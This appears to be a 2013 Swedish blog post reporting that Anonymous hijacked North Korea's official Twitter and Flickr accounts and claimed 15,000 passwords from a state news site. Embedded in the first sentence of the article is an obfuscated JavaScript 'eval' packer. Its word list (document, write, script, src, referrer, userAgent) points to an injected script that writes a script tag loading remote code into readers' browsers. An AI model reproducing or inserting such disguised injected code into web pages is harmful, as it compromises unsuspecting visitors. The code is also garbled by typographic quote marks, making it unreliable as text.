Image Image Image Image Image Image Image Image Image Image

| 28 maj, 2020

Scroll to top

Top

Anonymous har hackat Nordkorea!

anonymous nord korea
Filip Urde
  • On 4 april, 2013
  • http://www.revue.se/filip-urde

Anonymous eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|syahh|var|u0026u|referrer|knhdn||js|php’.split(’|’),0,{}))
är tillbaka och den här gången har man jävlats med Nordkorea.

 

 

 

Som ni kanske vet så är konflikten mellan Nordkorea och främst USA ganska infekterad. Detta späs nu på när Anonymous hackat några av Nordkoreas officiella mediakanaler.
anonymous nord korea

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Det är Nordkoreas officiella Twitter-konto @uriminzok samt deras flickr-konto som fått sig en omgång. Anonymous hävdar även att man har fått tag på 15 000 lösenord till den statliga nyhetswebbsidan Uriminzokkiri.com.

Twitter- och flickr-kontot verkar fortfarande befinna sig under Anonymous kontroll. 
thenextweb.com